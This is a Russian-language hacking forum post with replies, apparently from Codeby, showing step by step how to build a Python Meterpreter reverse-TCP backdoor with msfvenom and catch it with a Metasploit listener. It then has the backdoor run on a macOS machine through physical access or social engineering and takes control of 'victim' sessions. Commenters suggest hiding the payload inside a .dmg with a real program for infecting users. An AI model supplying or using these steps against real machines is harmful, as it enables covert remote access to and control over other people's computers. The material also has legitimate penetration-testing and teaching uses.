• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Meterpeter on OS X

На самом деле,тема достаточно старая и заезженная тема, но все таки решил поделиться ей с юными хацкерами, вдруг молодое поколение не знает английский :) По сути данная статья является переводом другой, взятой с , с небольшим добавлением информации от меня.

Итак, давайте представим, что у нас есть задача получить временный доступ на таргетированную машину с установленной OS X.
В моих планах было иследование СИ, ну а так же просто спортивный интерес :)

Ни для кого не секрет, что Metasploit является одним из сильнейщих инструментом для создания бекдоров.
Собственно говоря его то мы и будем рассматривать.

Первый этап - установка.
sudo pacman -S metasploit


Второй этап - создание нашего бекдорчика и запуск msf
Для начала нам необходимо создать наш файлик , который нужно будет запустить на таргетированной машине. Для этого в нашей консольки введем следующую команду:
Bash:
msfvenom -p python/meterpreter/reverse_tcp LHOST=*.*.*.* LPORT=**** > backdoor.py

Утилита msfvenom позволяет создать нам payload из обширного "меню"
Для тех кто в танке, payload == полезная нагрузка,руткит, слушатель и тд
Так же мы передаем такие параметры, как LHOST и LPORT.
LHOST является IP машины, куда будет перенапрвляться трафик с машины цели, LPORT - соответсвенно порт.

Теперь самое интересное. Давай-те наконец-то запустим msf.
Bash:
msfconsole

DeepinScreenshot_select-area_20180417132443.png

После запуска - софтинка нас встречает рандомным баннером, что достаточно мило и приятно x)

Третий этап - наконец то получили доступ ^~^

Итак, подготовка нашей рабочей машины:

Bash:
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST *.*.*.*
set LPORT ****
exploit -j -z
Уточню, что lhost и lport должны быть такими же,какие мы указали при создании файла

После этого - мы должны увидеть строчку, которая сообщает нам о том, что мы готовы к соединению
DeepinScreenshot_select-area_20180417150816.png


А теперь самое интересное :)

У нас есть на руках файлик, у нас есть цель. И что же делать?
Тут два варианта-либо физический доступ к машине , либо СИ.
Это уже Ваше решение, как загрузить файлик на таргет.

python backdoor.py


После успешного запуска на тагрете, в консоли мы сможем увидеть
DeepinScreenshot_select-area_20180417135144.png

Если у нас несколько "клиентов" попалось и запуск бекдора был осуществлен на нескольких машинах , мы можем посмотреть список всех жертв, благодаря sessions
DeepinScreenshot_select-area_20180417135515.png


Затем- мы выбираем нашу жертву , а точнее выбираем активную сессию sessions -i 3
И все, вуоля!

Мы внутри машины жертвы.
Чтобы убедиться в этом-мы можем использовать getuid
DeepinScreenshot_select-area_20180417135851.png


Для дальнейшего изучения возможностей хацкера в машине жертвы, настоятельно рекомендую изучить методы в команде help

Вывод:
В заключении хотелось бы сказать, жертвой являлся мой коллега, который был осведомлен. Ну а так же не злоупотребляйте хаками и помните, что карма все запоминает ^~^

Всем спасибо за внимание, жду критики )
 

Вложения

  • DeepinScreenshot_select-area_20180417134738.png
    DeepinScreenshot_select-area_20180417134738.png
    29,7 КБ · Просмотры: 168
  • Unnamed.png
    Unnamed.png
    44,6 КБ · Просмотры: 184
Последнее редактирование:

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
92
Думаю что запуск через питон не самый подходящий вариант. ИМХО автору лучше было бы представить вариант сборки с .dmg+реальной программой. Тем более это более грамотный подход с точки зрения заражения пользователя при пентесте. Но это только ИМХО.
 
  • Нравится
Реакции: G0p43R

G0p43R

Green Team
27.02.2018
125
167
BIT
0
У меня была такая идея, но что то я решил пойти более простым путем. У меня есть подход и решение через .dmg :)

Но, понимаете, данная статья появилась только из тех соображений, что у меня был физ доступ к машине. Чисто таргтетированный подход, через питон, я полагаю это гораздо проще сделать, когда есть физ доступ.

Когда мы говорим про массовое зарожение, то да, Ваше замечание вполне весомо.

Спасибо :)
 
  • Нравится
Реакции: z3r0c10wn

Djon253

Green Team
15.11.2017
120
93
BIT
1
Во всём этом самое интересное как раз создание полезной нагрузки (и смешивание с реальной программой), а само интересное доставка к цели (СИ). То что написал автор, как раз самое неинтересное. Гугл просто забит этим материалом. Но это мое мнение. Продолжите пожалуйста, и раскройте тему. В жизни у вас 100%не будет доступа к цели)))).
 
  • Нравится
Реакции: Valkiria
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!